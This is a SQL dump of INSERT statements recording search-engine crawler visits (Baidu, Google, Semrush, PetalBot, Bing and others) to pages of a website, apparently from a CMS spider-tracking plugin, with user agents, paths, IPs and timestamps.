INSERT INTO `ey_weapp_spider_visit` VALUES ('97465', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/37.html', '220.181.108.101', '1661742602', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97467', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/16_6.html', '185.191.171.22', '1661743060', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97261', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/4_8.html', '116.179.32.210', '1661653690', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97456', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/158.html', '185.191.171.24', '1661738340', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97421', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661716247', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97313', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/312.html', '116.179.32.66', '1661669728', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97270', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/466.html', '66.249.79.112', '1661657235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97263', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/125.html', '66.249.79.108', '1661654004', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97463', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/310.html', '114.119.151.153', '1661740992', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97264', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/365.html', '185.191.171.44', '1661654573', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97462', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/196.html', '185.191.171.1', '1661740834', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97459', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/list_3_36/', '116.179.32.195', '1661739331', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97266', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/news/143.html', '157.55.39.90', '1661654972', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97458', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/', '49.7.21.88', '1661739169', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97267', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_22/', '185.191.171.9', '1661655439', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97457', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/336.html', '66.249.79.110', '1661738920', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97268', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/', '66.249.79.110', '1661656338', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97269', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/sw.html', '114.119.151.153', '1661657021', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97291', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_32/', '114.119.151.155', '1661663186', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97292', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661663242', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97296', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.110', '1661663950', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97440', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_50.html', '185.191.171.24', '1661732715', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97441', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/228.html', '116.179.32.196', '1661732783', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97297', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/116.html', '66.249.79.112', '1661664263', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97298', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '125.224.191.83', '1661664362', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97301', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661664924', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97302', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/109.html', '116.179.32.28', '1661667055', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97438', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/chezaibengal/', '114.119.151.155', '1661732385', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97425', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/54.html', '185.191.171.42', '1661721898', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97426', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/193.html', '220.181.108.168', '1661722968', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97308', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/72.html', '114.119.151.155', '1661668484', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97424', '2', 'mozilla/5.0 (linux;u;android 4.2.2;zh-cn;) applewebkit/534.46 (khtml,like gecko) version/5.1 mobile safari/10600.6.3 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/153.html', '220.181.108.90', '1661719693', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97310', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/300.html', '114.119.151.155', '1661669067', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97423', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/130.html', '216.244.66.194', '1661718989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97335', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/228.html', '66.249.79.108', '1661678199', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97348', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/346.html', '185.191.171.7', '1661684087', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97380', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.112', '1661702392', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97349', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/121.html', '66.249.79.110', '1661684128', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97375', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '125.224.232.53', '1661699585', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97350', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_31/', '114.119.151.155', '1661684850', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97369', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/286.html', '66.249.79.112', '1661697517', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97370', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/tb/', '207.46.13.213', '1661697666', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97352', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/81.html', '66.249.79.110', '1661685166', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97353', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/60.html', '116.179.32.207', '1661685336', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97354', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/list_3_59/', '185.191.171.26', '1661686171', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97371', '2', 'mozilla/5.0 (compatible; baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)', '/', '140.237.230.172', '1661697994', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97372', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bengche/', '185.191.171.10', '1661698203', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97373', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/150.html', '66.249.79.110', '1661698846', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97374', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.146', '1661699531', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97391', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bds.html', '114.119.151.155', '1661706442', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97392', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/message', '220.181.108.114', '1661706604', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97376', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/chukouquanqiu', '220.181.108.178', '1661700057', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97377', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/473.html', '66.249.79.112', '1661700176', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97378', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/290.html', '216.244.66.194', '1661700838', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97389', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/463.html', '114.119.151.153', '1661706272', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97390', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/123.html', '185.191.171.42', '1661706292', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97384', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/154.html', '216.244.66.194', '1661704661', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97385', '99', 'mozilla/5.0 (macintosh; intel mac os x 10_15_5) applewebkit/605.1.15 (khtml, like gecko) version/13.1.1 safari/605.1.15 (applebot/0.1; +http://www.apple.com/go/applebot)', '/products/336.html', '17.121.115.6', '1661705172', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97386', '6', 'mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)', '/blj/', '207.46.13.9', '1661705264', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97383', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/316.html', '185.191.171.1', '1661703941', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97398', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/case/238.html', '114.119.151.153', '1661707597', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97397', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/394.html', '185.191.171.14', '1661707439', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97408', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/products/69.html', '66.249.79.108', '1661709769', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97412', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/products/list_2_3', '114.119.151.153', '1661712548', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97410', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/472.html', '66.249.79.108', '1661710899', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97413', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/198.html', '220.181.108.101', '1661713150', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98283', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/25_7.html', '185.191.171.5', '1662123660', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98196', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/19.html', '66.249.79.110', '1662079386', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98147', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/9_43.html', '185.191.171.16', '1662065095', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97466', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/hangyexinwen/list_18_25/', '114.119.151.155', '1661742620', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97460', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4.html', '185.191.171.22', '1661739862', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97461', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '69.14.27.140', '1661740200', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98087', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/list_3_62/', '66.249.79.112', '1662038288', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('98036', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljxw/', '114.119.151.155', '1662010969', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97473', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/233.html', '185.191.171.2', '1661745711', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97474', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/4_17.html', '185.191.171.16', '1661746530', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97482', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/377.html', '185.191.171.23', '1661751240', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97480', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/499.html', '220.181.108.178', '1661751026', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97481', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/203.html', '185.191.171.39', '1661751175', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97485', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/38.html', '220.181.108.81', '1661754300', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97486', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/229.html', '66.249.79.110', '1661754516', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97944', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/34.html', '185.191.171.16', '1661957980', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97945', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/289.html', '216.244.66.194', '1661958137', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97499', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/bljwd/list_20_6/', '114.119.151.153', '1661761937', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97504', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/19.html', '114.119.151.153', '1661763482', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97505', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/honor/25.html', '114.119.151.153', '1661763774', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97707', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/', '66.249.79.112', '1661862182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97680', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/220.html', '114.119.151.155', '1661841598', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97649', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/buliaoji/', '185.191.171.22', '1661833684', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97650', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.101 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/bengche/', '66.249.79.110', '1661833730', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97800', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/109.html', '66.249.79.108', '1661894767', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97662', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/349.html', '114.119.151.153', '1661836827', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97794', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/345.html', '66.249.79.112', '1661893702', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97683', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/case/68.html', '185.191.171.19', '1661844182', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97793', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/359.html', '66.249.79.108', '1661893659', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97642', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/395.html', '185.191.171.6', '1661831491', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97660', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/news/173.html', '220.181.108.155', '1661836269', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97697', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/282.html', '185.191.171.37', '1661854907', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97835', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/products/352.html', '220.181.108.83', '1661906560', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97688', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/312.html', '66.249.79.112', '1661849201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97687', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '220.181.108.145', '1661848124', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97830', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tags/39_4.html', '185.191.171.11', '1661904910', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97850', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/guilin.html', '114.119.151.153', '1661911429', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97689', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/274.html', '185.191.171.16', '1661849348', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97781', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/czb/', '220.181.108.92', '1661891833', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97690', '4', 'mozilla/5.0 (windows nt 6.1; wow64) applewebkit/537.36 (khtml, like gecko) chrome/50.0.2661.102 safari/537.36; 360spider', '/news/165.html', '42.236.10.113', '1661850148', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97691', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/bljwd/list_20_5/', '185.191.171.42', '1661850602', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97700', '99', 'mozilla/5.0 (compatible; dotbot/1.2; +https://opensiteexplorer.org/dotbot; help@moz.com)', '/news/459.html', '216.244.66.194', '1661856874', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97768', '3', 'sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)', '/news/497.html', '58.250.125.68', '1661888872', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97706', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/news/215.html', '185.191.171.15', '1661861235', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97703', '99', 'mozilla/5.0 (compatible; semrushbot/7~bl; +http://www.semrush.com/bot.html)', '/tuobeng/', '185.191.171.45', '1661859293', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97718', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_5/', '114.119.151.155', '1661866886', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97720', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/news/list_3_66/', '114.119.151.153', '1661867427', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97726', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/jas.html', '114.119.151.155', '1661868337', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97729', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/tns.html', '114.119.151.153', '1661869191', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97747', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/tags/233.html', '116.179.32.19', '1661884470', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97751', '1', 'mozilla/5.0 (linux; android 6.0.1; nexus 5x build/mmb29p) applewebkit/537.36 (khtml, like gecko) chrome/104.0.5112.79 mobile safari/537.36 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/yqal/', '66.249.79.112', '1661886201', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97753', '2', 'mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)', '/', '223.119.201.6', '1661886640', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97769', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/252.html', '66.249.79.110', '1661888891', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97785', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.112', '1661892989', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97841', '99', 'mozilla/5.0 (linux; android 7.0;) applewebkit/537.36 (khtml, like gecko) mobile safari/537.36 (compatible; petalbot;+https://webmaster.petalsearch.com/site/petalbot)', '/city/bss.html', '114.119.151.153', '1661909499', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97784', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/102.html', '66.249.79.110', '1661892925', '0');
INSERT INTO `ey_weapp_spider_visit` VALUES ('97788', '1', 'mozilla/5.0 (compatible; googlebot/2.1; +http://www.google.com/bot.html)', '/news/248.html', '66.249.79.112', '1661893205', '0');
